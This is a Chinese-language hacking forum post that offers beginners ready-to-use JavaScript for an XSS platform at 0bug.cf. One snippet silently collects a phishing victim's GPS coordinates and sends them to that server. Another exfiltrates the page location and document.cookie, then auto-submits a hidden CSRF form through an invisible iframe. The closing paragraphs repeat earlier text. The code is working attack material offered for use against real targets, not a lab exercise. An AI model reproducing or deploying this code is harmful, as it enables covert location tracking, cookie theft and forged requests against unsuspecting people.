[Onls丶辜釉]利用XSS平台打造傻瓜式获取GPS定位和CSRF自提交模板

之前有表哥写过利用H5技术的GPS定位，也有其他表哥打造了个简易的专门利用H5获取GPS经纬度的平台。

前者我代码测试存在一些未知原因，总是出问题。后者我觉得为了个GPS定位专门搭建个平台无必要，还需要自己的服务器，而多数人使用大概也仅限于偶尔配合钓鱼网站社工精确地理位置。

总而言之对小白都不太友好，使用也不方便。

Onls看了下代码原理，发现归根结底就是利用H5自带的GPS对象，通过JavaScript来获取和处理经纬度信息，那么我觉得，最适合的方式应该是像使用XSS平台打Cookie那样，将利用代码抽象成一段js外链，大家不用管它具体是如何执行的，只需要在自己的钓鱼页面中引入这段js外链即可,类似于大家平时XSS插的：<script src="https://xss.com/xss"></script>，不需要额外的特殊操作。

XSS平台用法就不介绍了，我这用的是开源代码搭建在自己服务器的XSS平台,(支持http和https)：https://0bug.cf

 

你们如果有自己常用的XSS平台的话，就去自己的XSS平台创建项目：

 

function getLocation() //获取GPS定位方法

  {

  if (navigator.geolocation)

    {

    navigator.geolocation.getCurrentPosition(showPosition);

    }

  else{x.innerHTML="Geolocation is not supported by this browser.";}

  }

function showPosition(position)

  {

//alert("Latitude: " + position.coords.latitude + "Longitude: " + position.coords.longitude); //测试，注释掉

    (new Image()).src='https://0bug.cf/index.php?do=api&id={projectId}&weidu='+position.coords.latitude+'&jingdu='+position.coords.longitude; //向XSS平台发送经纬度信息

}

      

getLocation();

 

在XSS平台上创建项目的时候，设置两个参数：

 


完成之后将XSS平台生成的外链插入自己准备好的钓鱼页面中就行了，Demo:https://0bug.cf/gps.html (手机打开，电脑没有GPS)

 

 

只需要在使用的时候构造针对特定目标的钓鱼页面，然后插入同一段已生产好的JS外链就够了。会自动接受经纬度并邮件提醒，实测QQ\微信\各主流浏览器都成功。

 

-------------------------------------------分割线----------------------------------------------

主要因为我之前那篇社工锁机病毒和CSRF实战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做，还有些问CSRF怎么代码自提交的，无法一 一回复，故总结在这篇文章里，下面是利用XSS平台来做CSRF外链：

利用XSS平台做CSRF POST方法隐藏表单后台自提交通用代码，能知道对方点击了链接并且还能得到对方IP：

 

(function(){(new Image()).src='https://0bug.cf/index.php?do=api&id={projectId}&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();

if('1'==1){keep=new Image();keep.src='https://0bug.cf/index.php?do=keepsession&id=WlATzF&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

   function csrfPost(postStr) {

    var de;

    de = document.body.appendChild(document.createElement('iframe'));  //创建一个隐藏iframe

    de.src = 'about:blank';

    de.height = 1;

    de.width = 1;

    de.contentDocument.write('<form method="POST" action="http://存在CSRF的目标网站接口地址" />

<input name="visible" value="PUBLIC" /> //这里的input数量和name/value值要根据目标实际情况修改

<input name="content" value="'+postStr+'" />//这里的input数量和name/value值要根据目标实际情况修改

<input name="video" value="" />//这里的input数量和name/value值要根据目标实际情况修改

<input name="videourl" value="" />//这里的input数量和name/value值要根据目标实际情况修改

<input value="Submit request" /></form>');

    de.contentDocument.forms[0].submit(); //表单自提交

    de.style.display = 'none';

        }

csrfPost('test');

 

只需要在使用的时候构造针对特定目标的钓鱼页面，然后插入同一段已生产好的JS外链就够了。会自动接受经纬度并邮件提醒，实测QQ\微信\各主流浏览器都成功。

 

-------------------------------------------分割线----------------------------------------------

主要因为我之前那篇社工锁机病毒和CSRF实战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做，还有些问CSRF怎么代码自提交的，无法一 一回复，故总结在这篇文章里，下面是利用XSS平台来做CSRF外链：

利用XSS平台做CSRF POST方法隐藏表单后台自提交通用代码，能知道对方点击了链接并且还能得到对方IP：